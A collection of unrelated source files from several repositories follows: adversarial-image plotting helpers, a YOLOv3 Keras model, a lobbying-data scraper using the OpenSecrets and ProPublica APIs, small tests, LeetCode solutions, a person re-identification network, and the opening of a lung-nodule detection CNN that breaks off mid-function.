ax2.set_title('Adversary')
ax2.axis('off')
ax3.imshow(diff)
ax3.set_title('Diff * %.1f' % scale)
ax3.axis('off')
if title:
fig.suptitle(title, fontsize=12, fontweight='bold', y=0.80)
# in case you do not have GUI interface
plt.savefig(figname, bbox_inches='tight')
plt.show()
def plot_image_objectdetection(adversary, kmodel, bounds=(0, 1), title=None, figname='compare.png') :
from perceptron.utils.image import draw_letterbox
pred_ori = kmodel.predictions(adversary.original_image)
pred_adv = kmodel.predictions(adversary.image)
class_names = kmodel.get_class()
ori_image = draw_letterbox(adversary.original_image, pred_ori, class_names=class_names, bounds=bounds)
adv_image = draw_letterbox(adversary.image, pred_adv, class_names=class_names, bounds=bounds)
import matplotlib.pyplot as plt
fig, (ax1, ax2) = plt.subplots(1, 2)
plt.axis('off')
ax1.imshow(ori_image)
ax1.set_title('Origin')
ax1.axis('off')
ax2.imshow(adv_image)
ax2.set_title('Adversary')
ax2.axis('off')
if title :
fig.suptitle(title, fontsize=12, fontweight='bold', y=0.9)
# in case you do not have a GUI interface
plt.savefig(figname, bbox_inches='tight', dpi=1000)
plt.show()
```
#### File: zoo/yolov3/model.py
```python
from functools import wraps
from functools import reduce
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import Conv2D
from keras.layers import Add
from keras.layers import ZeroPadding2D
from keras.layers import UpSampling2D
from keras.layers import Concatenate
from keras.layers import MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.layers import Input
from keras.regularizers import l2
def YOLOv3(num_anchors=3, weight_file="yolov3.h5", num_classes=80):
from perceptron.utils.func import maybe_download_model_data
model = yolo_body(Input(shape=(None, None, 3)), num_anchors, num_classes)
weight_fpath = maybe_download_model_data(
weight_file,
'https://perceptron-benchmark.s3-us-west-1.amazonaws.com/models/coco/yolov3.h5')
model.load_weights(weight_fpath)
return model
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.')
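# Illustrative example (not part of the original file): compose evaluates left to right,
# so compose(f, g)(x) == g(f(x)); e.g. compose(lambda v: v + 1, lambda v: v * 2)(3) == 8.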
@wraps(Conv2D)
def DarknetConv2D(*args, **kwargs):
"""Wrapper to set Darknet parameters for Convolution2D."""
darknet_conv_kwargs = {'kernel_regularizer': l2(5e-4)}
darknet_conv_kwargs['padding'] = 'valid' if \
kwargs.get('strides') == (2, 2) else 'same'
darknet_conv_kwargs.update(kwargs)
return Conv2D(*args, **darknet_conv_kwargs)
def DarknetConv2D_BN_Leaky(*args, **kwargs):
"""Darknet Convolution2D followed by BatchNormalization and LeakyReLU."""
no_bias_kwargs = {'use_bias': False}
no_bias_kwargs.update(kwargs)
return compose(
DarknetConv2D(*args, **no_bias_kwargs),
BatchNormalization(),
LeakyReLU(alpha=0.1))
def resblock_body(x, num_filters, num_blocks):
'''A series of resblocks starting with a downsampling Convolution2D'''
# Darknet uses left and top padding instead of 'same' mode
x = ZeroPadding2D(((1, 0), (1, 0)))(x)
x = DarknetConv2D_BN_Leaky(num_filters, (3, 3), strides=(2, 2))(x)
for i in range(num_blocks):
y = compose(
DarknetConv2D_BN_Leaky(num_filters // 2, (1, 1)),
DarknetConv2D_BN_Leaky(num_filters, (3, 3)))(x)
x = Add()([x, y])
return x
def darknet_body(x):
'''Darknet body having 52 Convolution2D layers'''
x = DarknetConv2D_BN_Leaky(32, (3, 3))(x)
x = resblock_body(x, 64, 1)
x = resblock_body(x, 128, 2)
x = resblock_body(x, 256, 8)
x = resblock_body(x, 512, 8)
x = resblock_body(x, 1024, 4)
return x
def make_last_layers(x, num_filters, out_filters):
'''6 Conv2D_BN_Leaky layers followed by a Conv2D_linear layer'''
x = compose(
DarknetConv2D_BN_Leaky(num_filters, (1, 1)),
DarknetConv2D_BN_Leaky(num_filters * 2, (3, 3)),
DarknetConv2D_BN_Leaky(num_filters, (1, 1)),
DarknetConv2D_BN_Leaky(num_filters * 2, (3, 3)),
DarknetConv2D_BN_Leaky(num_filters, (1, 1)))(x)
y = compose(
DarknetConv2D_BN_Leaky(num_filters * 2, (3, 3)),
DarknetConv2D(out_filters, (1, 1)))(x)
return x, y
def yolo_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 model CNN body in Keras."""
darknet = Model(inputs, darknet_body(inputs))
x, y1 = make_last_layers(
darknet.output, 512, num_anchors * (num_classes + 5))
x = compose(
DarknetConv2D_BN_Leaky(256, (1, 1)),
UpSampling2D(2))(x)
x = Concatenate()([x, darknet.layers[152].output])
x, y2 = make_last_layers(x, 256, num_anchors * (num_classes + 5))
x = compose(
DarknetConv2D_BN_Leaky(128, (1, 1)),
UpSampling2D(2))(x)
x = Concatenate()([x, darknet.layers[92].output])
x, y3 = make_last_layers(x, 128, num_anchors * (num_classes + 5))
return Model(inputs, [y1, y2, y3])
def tiny_yolo_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 model CNN body in keras.'''
x1 = compose(
DarknetConv2D_BN_Leaky(16, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(32, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(64, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(128, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(256, (3, 3)))(inputs)
x2 = compose(
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(512, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(1, 1), padding='same'),
DarknetConv2D_BN_Leaky(1024, (3, 3)),
DarknetConv2D_BN_Leaky(256, (1, 1)))(x1)
y1 = compose(
DarknetConv2D_BN_Leaky(512, (3, 3)),
DarknetConv2D(num_anchors * (num_classes + 5), (1, 1)))(x2)
x2 = compose(
DarknetConv2D_BN_Leaky(128, (1, 1)),
UpSampling2D(2))(x2)
y2 = compose(
Concatenate(),
DarknetConv2D_BN_Leaky(256, (3, 3)),
DarknetConv2D(num_anchors * (num_classes + 5), (1, 1)))([x2, x1])
return Model(inputs, [y1, y2])
``` |
{
"source": "jiayuqiujq/OpenSecrets_Senators_Industries",
"score": 3
} |
#### File: src/OpenSecrets_Senators_Industries/OpenSecrets_Senators_Industries.py
```python
from json.decoder import JSONDecodeError
import pandas as pd
import requests
from bs4 import BeautifulSoup
import lxml
# Web-scraping the OpenSecrets website for the Top 20 Industries that have spent the most on Federal Lobbying
def top_20_industries_ids(year='a'):
"""
Extracts the Top 20 Industries that have spent the most on Federal Lobbying from
https://www.opensecrets.org/federal-lobbying/industries.
Parameters
----------
year : str, optional
Specific year (1998 - 2021) for which to retrieve the data (the default is 'a', which
returns the total amount of money spent on Federal Lobbying across all years from 1998 - 2021).
Returns
-------
pandas.DataFrame
Dataframe containing the Top 20 Industries that have spent the most on Federal Lobbying, the amount of
money they have each spent, and their unique Industry IDs.
Examples
--------
>>> top_20_industries_ids()
[ Industry Total IDs
0 Pharmaceuticals/Health Products $4,990,257,367 H04
1 Insurance $3,210,878,113 F09
2 Electronics Mfg & Equip $2,795,736,767 B12
3 Electric Utilities $2,757,808,440 E08
4 Business Associations $2,623,983,096 N00
5 Oil & Gas $2,489,418,498 E01
6 Hospitals/Nursing Homes $2,025,651,797 H02
7 Misc Manufacturing & Distributing $2,008,839,171 N15
8 Education $1,902,258,320 W04
9 Securities & Investment $1,897,760,970 F07
10 Civil Servants/Public Officials $1,887,599,161 W03
11 Telecom Services $1,883,769,733 B09
12 Real Estate $1,874,450,800 F10
13 Air Transport $1,730,349,996 M01
14 Health Professionals $1,712,045,500 H01
15 Health Services/HMOs $1,405,134,830 H03
16 Automotive $1,322,462,732 M02
17 TV/Movies/Music $1,301,018,584 B02
18 Misc Issues $1,247,693,549 Q10
19 Defense Aerospace $1,232,991,613 D01 ]
"""
url = ('https://www.opensecrets.org/federal-lobbying/industries?cycle=' + str(year))
html = requests.get(url)
soup = BeautifulSoup(html.text, 'html.parser')
# Extracting all the URLs from the website
urls = []
for link in soup.find_all('a'):
urls.append(link.get('href'))
# Extracting URLs that contain the unique industry IDs corresponding to each of the Top 20
url_ids = [url for url in urls if 'federal-lobbying/industries/summary' in url]
url_ids_df = pd.DataFrame(url_ids)
# Splitting the IDs from the rest of the URL
ids = url_ids_df[0].str.split('id=')
# Extracting list of unique industry IDs corresponding to each industry
industry_id = []
for i in range(len(ids)):
industry_id.append(ids[i][1])
# Extracting table of Top 20 Industries that have spent the most on Federal Lobbying along with the respective
# amounts they have spent
df = pd.read_html(html.text)[0][:20]
# Adding a column to the table which contains the industry IDs corresponding to each Industry
df['IDs'] = industry_id
return df
class ProPublicaAPIKey:
"""
All functions that require the ProPublica API Key.
Attributes
----------
propublica_api_key: str
ProPublica API Key to use ProPublica's Congress API. The API Key can be requested from
https://www.propublica.org/datastore/api/propublica-congress-api.
"""
def __init__(self, propublica_api_key):
self.propublica_api_key = propublica_api_key
def senate_members(self, congress_sitting=117):
"""
Uses the ProPublica API to extract a list of Senators.
Parameters
----------
congress_sitting: int, optional
Specifies the sitting of Congress (80-117) for which to retrieve senators
(the default is 117, which returns all the senators in the 117th Congress).
Returns
-------
pandas.DataFrame
Pandas DataFrame containing the names, state and CRP IDs of all senators in a particular sitting of
Congress.
Examples
--------
>>> ProPublica = ProPublicaAPIKey('insert ProPublica API Key here')
>>> ProPublica.senate_members()
[ first_name middle_name last_name state crp_id
0 Tammy None Baldwin WI N00004367
1 John None Barrasso WY N00006236
2 Michael None Bennet CO N00030608
3 Marsha None Blackburn TN N00003105
4 Richard None Blumenthal CT N00031685
... ... ... ... ... ...
97 Elizabeth None Warren MA N00033492
98 Sheldon None Whitehouse RI N00027533
99 Roger None Wicker MS N00003280
100 Ron None Wyden OR N00007724
101 Todd None Young IN N00030670
102 rows × 5 columns ]
"""
# Calling the ProPublica Congress API to extract information about senators in a particular sitting of Congress
headers = {'X-API-Key': self.propublica_api_key}
r = requests.get('https://api.propublica.org/congress/v1/' + str(congress_sitting) + '/senate/members.json',
headers=headers)
try:
senate_members = r.json()
senate_members_df = pd.DataFrame(senate_members['results'][0]['members'])
# Selecting relevant columns to return
new_cols = ['first_name', 'middle_name', 'last_name', 'state', 'crp_id']
result = senate_members_df[new_cols]
return result
except KeyError:
print(f'Error: Unexpected content returned from API. Check if API Key is correct.')
class OpenSecretsAPIKey:
"""
All functions that require the OpenSecrets API Key.
Attributes
----------
opensecrets_api_key: str
OpenSecrets API Key to use the OpenSecrets API. The API Key can be requested from
https://www.opensecrets.org/api/admin/index.php?function=signup.
"""
def __init__(self, opensecrets_api_key):
self.opensecrets_api_key = opensecrets_api_key
def top_senators_each_industry(self, propublica_api_key, industry_id='H04', **kwargs):
"""
Uses the OpenSecrets API and ProPublica API to provide the user with the senators who have received the most
funding from a particular industry.
As the function makes as many calls as there are senators in a particular sitting of Congress, it may take a
while to return the necessary results.
Parameters
----------
propublica_api_key: class ProPublicaAPIKey
The user's ProPublica API Key. See documentation on ProPublicaAPIKey.
industry_id: str, optional
Unique industry_id. Full list of industry IDs can be found at www.opensecrets.org/downloads/crp/CRP_IDs.xls.
The user can also call top_20_industries_ids() to retrieve industry_ids. See documentation on
top_20_industries_ids() (the default is 'H04', corresponding to Pharmaceuticals/Health Products industry).
**kwargs : str, optional
Extra arguments to 'propublica_api_key.senate_members'. See documentation on
propublica_api_key.senate_members for possible arguments.
Returns
-------
pandas.DataFrame
Pandas DataFrame with senators ranked by how much funding they have received from a
particular industry.
Examples
--------
>>> OpenSecrets = OpenSecretsAPIKey('insert OpenSecrets API Key here')
>>> ProPublica = ProPublicaAPIKey('insert ProPublica API Key here')
>>> OpenSecrets.top_senators_each_industry(ProPublica, industry_id = 'F09', congress_sitting = 116)
[ cand_name cid cycle industry last_updated party state total
0 Casey, Bob N00027503 2018 Insurance 06/10/19 D Pennsylvania 357820.0
1 <NAME> N00043290 2018 Insurance 06/10/19 R Florida 328912.0
2 <NAME> N00003535 2018 Insurance 06/10/19 D Ohio 316800.0
3 <NAME> N00033982 2018 Insurance 06/10/19 R Arizona 294825.0
4 <NAME> N00004118 2018 Insurance 06/10/19 D Michigan 292400.0
... ... ... ... ... ... ... ... ...
95 <NAME> N00013873 2018 Insurance 06/10/19 R Arkansas 3450.0
96 <NAME> N00031696 2018 Insurance 06/10/19 R Utah 3250.0
97 <NAME> N00006561 2018 Insurance 06/10/19 D New Mexico 1058.0
98 <NAME> N00009918 2018 Insurance 06/10/19 D Vermont 1015.0
99 <NAME> N00009920 2018 Insurance 06/10/19 R Alabama -5000.0
100 rows × 8 columns ]
See Also
--------
top_20_industries_ids()
ProPublicaAPIKey
"""
# Extracting Senators' CRP_IDs
senators_crp_id = propublica_api_key.senate_members(**kwargs)['crp_id']
# Initialising empty DataFrame for storing results
result = pd.DataFrame()
# Loop to retrieve the contributions received by each senator from the industry and store them in a DataFrame
for senator_id in senators_crp_id:
params = {'apikey': self.opensecrets_api_key, 'cid': senator_id, 'ind': industry_id, 'output': 'json'}
r_opensecrets = requests.get('https://www.opensecrets.org/api/?method=candIndByInd&', params=params)
# Skip calls that return a null result because the record does not exist
try:
r_json = r_opensecrets.json()
r_df = pd.DataFrame(r_json['response']['candIndus'])
r_df_transpose = r_df.transpose()
# Progressively building DataFrame by adding each successful call to the DataFrame
result = pd.concat([result, r_df_transpose])
except JSONDecodeError:
pass
try:
# Changing values in 'total' column from str to float for sorting later
result['total'] = result['total'].astype(float)
# Selecting relevant columns to return
new_cols = ['cand_name', 'cid', 'cycle', 'industry', 'last_updated', 'party', 'state', 'total']
result = result.sort_values('total', ascending=False)[new_cols]
result = result.reset_index(drop=True)
return result
except KeyError:
print(f'Error: Unexpected content returned from API. Check if API Key is correct.')
``` |
{
"source": "jiayushe/hnr-2021",
"score": 3
} |
#### File: src/tests/test_utils.py
```python
import os
from utils import get_env_variable
def test_get_env_variable_fail():
# track whether the call raised, so the final assert is not swallowed by the except clause
raised = False
try:
get_env_variable("not-existing-env")
except Exception:
raised = True
assert raised, "Expected KeyError exception was not raised"
def test_get_env_variable_success():
os.environ["MY_ENV_VAR"] = "my-env-var"
try:
env_var = get_env_variable("MY_ENV_VAR")
assert env_var == "my-env-var"
assert not env_var == "wrong-var"
except Exception:
assert False
``` |
{
"source": "JiayuXu/leetcode-cn-answer",
"score": 3
} |
#### File: JiayuXu/leetcode-cn-answer/14.py
```python
from typing import List
class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
if len(strs)==0:
return ""
if len(strs)==1:
return strs[0]
if strs[0]=="":
return ""
for i,a in enumerate(strs[0]):
flag=True
for s in strs:
if i>=len(s) or a!=s[i]:
flag=False
break
if not flag:
return strs[0][:i]
# every character of strs[0] matched all strings, so strs[0] itself is the common prefix
return strs[0]
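# Example: longestCommonPrefix(["flower", "flow", "flight"]) returns "fl"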
```
#### File: JiayuXu/leetcode-cn-answer/1.py
```python
from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
d={}
for i,n in enumerate(nums):
d_n=target-n
if d_n in d:
return [d[d_n],i]
d[n]=i
return [None,None]
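# Example: twoSum([2, 7, 11, 15], 9) returns [0, 1] because nums[0] + nums[1] == 9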
```
#### File: JiayuXu/leetcode-cn-answer/70.py
```python
class Solution:
def climbStairs(self, n: int) -> int:
if n==1:
return 1
if n==2:
return 2
l=[1,2]
for i in range(2,n):
l.append(l[i-1]+l[i-2])
return l.pop()
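# Example: climbStairs(4) returns 5 (the DP list grows as [1, 2, 3, 5])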
``` |
{
"source": "JiazeWang/grad-cam-pytorch",
"score": 3
} |
#### File: JiazeWang/grad-cam-pytorch/mgn.py
```python
import copy
import torch
from torch import nn
import torch.nn.functional as F
from torchvision.models.resnet import resnet50, Bottleneck
#def make_model(args):
# return MGN(args)
class ConvBlock(nn.Module):
"""Basic convolutional block:
convolution + batch normalization + relu.
Args (following http://pytorch.org/docs/master/nn.html#torch.nn.Conv2d):
- in_c (int): number of input channels.
- out_c (int): number of output channels.
- k (int or tuple): kernel size.
- s (int or tuple): stride.
- p (int or tuple): padding.
"""
def __init__(self, in_c, out_c, k, s=1, p=0):
super(ConvBlock, self).__init__()
self.conv = nn.Conv2d(in_c, out_c, k, stride=s, padding=p)
self.bn = nn.BatchNorm2d(out_c)
def forward(self, x):
return F.relu(self.bn(self.conv(x)))
class SpatialAttn(nn.Module):
"""Spatial Attention (Sec. 3.1.I.1)"""
def __init__(self):
super(SpatialAttn, self).__init__()
self.conv1 = ConvBlock(1, 1, 3, s=2, p=1)
self.conv2 = ConvBlock(1, 1, 1)
def forward(self, x):
# global cross-channel averaging
x = x.mean(1, keepdim=True)
# 3-by-3 conv
x = self.conv1(x)
# bilinear resizing
x = F.upsample(x, (x.size(2)*2, x.size(3)*2), mode='bilinear', align_corners=True)
# scaling conv
x = self.conv2(x)
return x
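# Shape sketch (for illustration): an input of shape (B, C, H, W) is averaged over channels
# to (B, 1, H, W), downsampled by the stride-2 conv to roughly (B, 1, H/2, W/2), upsampled
# back to (B, 1, H, W) by the bilinear resize, and passed through the 1x1 scaling conv.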
class ChannelAttn(nn.Module):
"""Channel Attention (Sec. 3.1.I.2)"""
def __init__(self, in_channels, reduction_rate=16):
super(ChannelAttn, self).__init__()
assert in_channels%reduction_rate == 0
self.conv1 = ConvBlock(in_channels, in_channels // reduction_rate, 1)
self.conv2 = ConvBlock(in_channels // reduction_rate, in_channels, 1)
def forward(self, x):
# squeeze operation (global average pooling)
x = F.avg_pool2d(x, x.size()[2:])
# excitation operation (2 conv layers)
x = self.conv1(x)
x = self.conv2(x)
return x
class SoftAttn(nn.Module):
"""Soft Attention (Sec. 3.1.I)
Aim: Spatial Attention + Channel Attention
Output: attention maps with shape identical to input.
"""
def __init__(self, in_channels):
super(SoftAttn, self).__init__()
self.spatial_attn = SpatialAttn()
self.channel_attn = ChannelAttn(in_channels)
self.conv = ConvBlock(in_channels, in_channels, 1)
def forward(self, x):
y_spatial = self.spatial_attn(x)
y_channel = self.channel_attn(x)
y = y_spatial * y_channel
y = torch.sigmoid(self.conv(y))
return y
class HarmAttn(nn.Module):
"""Harmonious Attention (Sec. 3.1)"""
def __init__(self, in_channels):
super(HarmAttn, self).__init__()
self.soft_attn = SoftAttn(in_channels)
def forward(self, x):
y_soft_attn = self.soft_attn(x)
return y_soft_attn
class MGN(nn.Module):
def __init__(self):
super(MGN, self).__init__()
num_classes =739
num_feats = 256
resnet = resnet50(pretrained=True)
self.backone = nn.Sequential(
resnet.conv1,
resnet.bn1,
resnet.relu,
resnet.maxpool,
resnet.layer1,
resnet.layer2,
resnet.layer3[0],
)
self.ha1 = HarmAttn(1024)
res_conv4 = nn.Sequential(*resnet.layer3[1:])
res_g_conv5 = resnet.layer4
res_p_conv5 = nn.Sequential(
Bottleneck(1024, 512, downsample=nn.Sequential(nn.Conv2d(1024, 2048, 1, bias=False), nn.BatchNorm2d(2048))),
Bottleneck(2048, 512),
Bottleneck(2048, 512))
res_p_conv5.load_state_dict(resnet.layer4.state_dict())
self.p1 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))
self.p2 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))
self.p3 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))
#if args.pool == 'max':
#pool2d = nn.MaxPool2d
#elif args.pool == 'avg':
pool2d = nn.AvgPool2d
#else:
# raise Exception()
self.maxpool_zg_p1 = pool2d(kernel_size=(24, 8))
self.maxpool_zg_p2 = pool2d(kernel_size=(24, 8))
self.maxpool_zg_p3 = pool2d(kernel_size=(24, 8))
self.maxpool_zp2 = pool2d(kernel_size=(12, 8))
self.maxpool_zp3 = pool2d(kernel_size=(8, 8))
reduction = nn.Sequential(nn.Conv2d(2048, num_feats, 1, bias=False), nn.BatchNorm2d(num_feats), nn.ReLU())
self._init_reduction(reduction)
self.reduction_0 = copy.deepcopy(reduction)
self.reduction_1 = copy.deepcopy(reduction)
self.reduction_2 = copy.deepcopy(reduction)
self.reduction_3 = copy.deepcopy(reduction)
self.reduction_4 = copy.deepcopy(reduction)
self.reduction_5 = copy.deepcopy(reduction)
self.reduction_6 = copy.deepcopy(reduction)
self.reduction_7 = copy.deepcopy(reduction)
#self.fc_id_2048_0 = nn.Linear(2048, num_classes)
self.fc_id_2048_0 = nn.Linear(num_feats, num_classes)
self.fc_id_2048_1 = nn.Linear(num_feats, num_classes)
self.fc_id_2048_2 = nn.Linear(num_feats, num_classes)
self.fc_id_256_1_0 = nn.Linear(num_feats, num_classes)
self.fc_id_256_1_1 = nn.Linear(num_feats, num_classes)
self.fc_id_256_2_0 = nn.Linear(num_feats, num_classes)
self.fc_id_256_2_1 = nn.Linear(num_feats, num_classes)
self.fc_id_256_2_2 = nn.Linear(num_feats, num_classes)
self.fc_g = nn.Linear(num_feats * 8, num_classes)
self.fc_id_2048_0_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_2048_1_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_2048_2_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_1_0_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_1_1_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_2_0_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_2_1_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_2_2_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self._init_fc(self.fc_id_2048_0)
self._init_fc(self.fc_id_2048_1)
self._init_fc(self.fc_id_2048_2)
self._init_fc(self.fc_id_256_1_0)
self._init_fc(self.fc_id_256_1_1)
self._init_fc(self.fc_id_256_2_0)
self._init_fc(self.fc_id_256_2_1)
self._init_fc(self.fc_id_256_2_2)
self._init_fc(self.fc_g)
"""
self._init_fc(self.fc_id_2048_0_w)
self._init_fc(self.fc_id_2048_1_w)
self._init_fc(self.fc_id_2048_2_w)
self._init_fc(self.fc_id_256_1_0_w)
self._init_fc(self.fc_id_256_1_1_w)
self._init_fc(self.fc_id_256_2_0_w)
self._init_fc(self.fc_id_256_2_1_w)
self._init_fc(self.fc_id_256_2_2_w)
"""
@staticmethod
def _init_reduction(reduction):
# conv
nn.init.kaiming_normal_(reduction[0].weight, mode='fan_in')
#nn.init.constant_(reduction[0].bias, 0.)
# bn
nn.init.normal_(reduction[1].weight, mean=1., std=0.02)
nn.init.constant_(reduction[1].bias, 0.)
@staticmethod
def _init_fc(fc):
nn.init.kaiming_normal_(fc.weight, mode='fan_out')
#nn.init.normal_(fc.weight, std=0.001)
nn.init.constant_(fc.bias, 0.)
def forward(self, x):
x = self.backone(x)
x_attention = self.ha1(x)
#x_attn, x_theta = self.ha1(x)
x = x * x_attention
p1 = self.p1(x)
p2 = self.p2(x)
p3 = self.p3(x)
zg_p1 = self.maxpool_zg_p1(p1)
zg_p2 = self.maxpool_zg_p2(p2)
zg_p3 = self.maxpool_zg_p3(p3)
zp2 = self.maxpool_zp2(p2)
z0_p2 = zp2[:, :, 0:1, :]
z1_p2 = zp2[:, :, 1:2, :]
zp3 = self.maxpool_zp3(p3)
z0_p3 = zp3[:, :, 0:1, :]
z1_p3 = zp3[:, :, 1:2, :]
z2_p3 = zp3[:, :, 2:3, :]
fg_p1 = self.reduction_0(zg_p1).squeeze(dim=3).squeeze(dim=2)
fg_p2 = self.reduction_1(zg_p2).squeeze(dim=3).squeeze(dim=2)
fg_p3 = self.reduction_2(zg_p3).squeeze(dim=3).squeeze(dim=2)
f0_p2 = self.reduction_3(z0_p2).squeeze(dim=3).squeeze(dim=2)
f1_p2 = self.reduction_4(z1_p2).squeeze(dim=3).squeeze(dim=2)
f0_p3 = self.reduction_5(z0_p3).squeeze(dim=3).squeeze(dim=2)
f1_p3 = self.reduction_6(z1_p3).squeeze(dim=3).squeeze(dim=2)
f2_p3 = self.reduction_7(z2_p3).squeeze(dim=3).squeeze(dim=2)
'''
l_p1 = self.fc_id_2048_0(zg_p1.squeeze(dim=3).squeeze(dim=2))
l_p2 = self.fc_id_2048_1(zg_p2.squeeze(dim=3).squeeze(dim=2))
l_p3 = self.fc_id_2048_2(zg_p3.squeeze(dim=3).squeeze(dim=2))
'''
l_p1 = self.fc_id_2048_0(fg_p1)
l_p2 = self.fc_id_2048_1(fg_p2)
l_p3 = self.fc_id_2048_2(fg_p3)
l0_p2 = self.fc_id_256_1_0(f0_p2)
l1_p2 = self.fc_id_256_1_1(f1_p2)
l0_p3 = self.fc_id_256_2_0(f0_p3)
l1_p3 = self.fc_id_256_2_1(f1_p3)
l2_p3 = self.fc_id_256_2_2(f2_p3)
#print("self.fc_id_2048_0_w(fg_p1).shape:",self.fc_id_2048_0_w(fg_p1).shape)
#print("fg_p1.shape:", fg_p1.shape)
lfg_p1 = self.fc_id_2048_0_w(fg_p1) * fg_p1
#print("lfg_p1.shape:", lfg_p1.shape)
lfg_p2 = self.fc_id_2048_1_w(fg_p2) * fg_p2
lfg_p3 = self.fc_id_2048_2_w(fg_p3) * fg_p3
lf0_p2 = self.fc_id_256_1_0_w(f0_p2) * f0_p2
lf1_p2 = self.fc_id_256_1_1_w(f1_p2) * f1_p2
lf0_p3 = self.fc_id_256_2_0_w(f0_p3) * f0_p3
lf1_p3 = self.fc_id_256_2_1_w(f1_p3) * f1_p3
lf2_p3 = self.fc_id_256_2_2_w(f2_p3) * f2_p3
predict = torch.cat([lfg_p1, lfg_p2, lfg_p3, lf0_p2, lf1_p2, lf0_p3, lf1_p3, lf2_p3], dim=1)
g1 = self.fc_g(predict)
#predict = torch.cat([lfg_p1, lf0_p2, lf1_p2, lf0_p3, lf1_p3, lf2_p3], dim=1)
#return predict
return g1
``` |
{
"source": "JiazeWang/Luna16",
"score": 2
} |
#### File: Luna16/model/net.py
```python
import torch
from torch import nn
from configs import ANCHOR_SIZES
class PostRes(nn.Module):
def __init__(self, n_in, n_out, stride=1):
super(PostRes, self).__init__()
self.conv1 = nn.Conv3d(n_in, n_out, kernel_size=3, stride=stride, padding=1)
self.bn1 = nn.BatchNorm3d(n_out)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv3d(n_out, n_out, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm3d(n_out)
if stride != 1 or n_out != n_in:
self.shortcut = nn.Sequential(
nn.Conv3d(n_in, n_out, kernel_size=1, stride=stride),
nn.BatchNorm3d(n_out))
else:
self.shortcut = None
def forward(self, x):
residual = x
if self.shortcut is not None:
residual = self.shortcut(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out += residual
out = self.relu(out)
return out
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.preBlock = nn.Sequential(
nn.Conv3d(1, 24, kernel_size=3, padding=1),
nn.BatchNorm3d(24),
nn.ReLU(inplace=True),
nn.Conv3d(24, 24, kernel_size=3, padding=1),
nn.BatchNorm3d(24),
nn.ReLU(inplace=True))
num_blocks_forw = [2, 2, 3, 3]
num_blocks_back = [3, 3]
self.featureNum_forw = [24, 32, 64, 64, 64]
self.featureNum_back = [128, 64, 64]
for i in range(len(num_blocks_forw)):
blocks = []
for j in range(num_blocks_forw[i]):
if j == 0:
blocks.append(PostRes(self.featureNum_forw[i], self.featureNum_forw[i + 1]))
else:
blocks.append(PostRes(self.featureNum_forw[i + 1], self.featureNum_forw[i + 1]))
setattr(self, 'forw' + str(i + 1), nn.Sequential(*blocks))
for i in range(len(num_blocks_back)):
blocks = []
for j in range(num_blocks_back[i]):
if j == 0:
if i == 0:
addition = 3
else:
addition = 0
blocks.append(PostRes(self.featureNum_back[i + 1] + self.featureNum_forw[i + 2] + addition,
self.featureNum_back[i]))
else:
blocks.append(PostRes(self.featureNum_back[i], self.featureNum_back[i]))
setattr(self, 'back' + str(i + 2), nn.Sequential(*blocks))
self.maxpool1 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.maxpool2 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.maxpool3 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.maxpool4 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.unmaxpool1 = nn.MaxUnpool3d(kernel_size=2, stride=2)
self.unmaxpool2 = nn.MaxUnpool3d(kernel_size=2, stride=2)
self.path1 = nn.Sequential(
nn.ConvTranspose3d(64, 64, kernel_size=2, stride=2),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True))
self.path2 = nn.Sequential(
nn.ConvTranspose3d(64, 64, kernel_size=2, stride=2),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True))
self.drop = nn.Dropout3d(p=0.5, inplace=False)
self.output = nn.Sequential(nn.Conv3d(self.featureNum_back[0], 64, kernel_size=1),
nn.ReLU(),
nn.Conv3d(64, 5 * len(ANCHOR_SIZES), kernel_size=1))
def forward(self, x, coord):
out = self.preBlock(x) # 16
out_pool, indices0 = self.maxpool1(out)
out1 = self.forw1(out_pool) # 32
out1_pool, indices1 = self.maxpool2(out1)
out2 = self.forw2(out1_pool) # 64
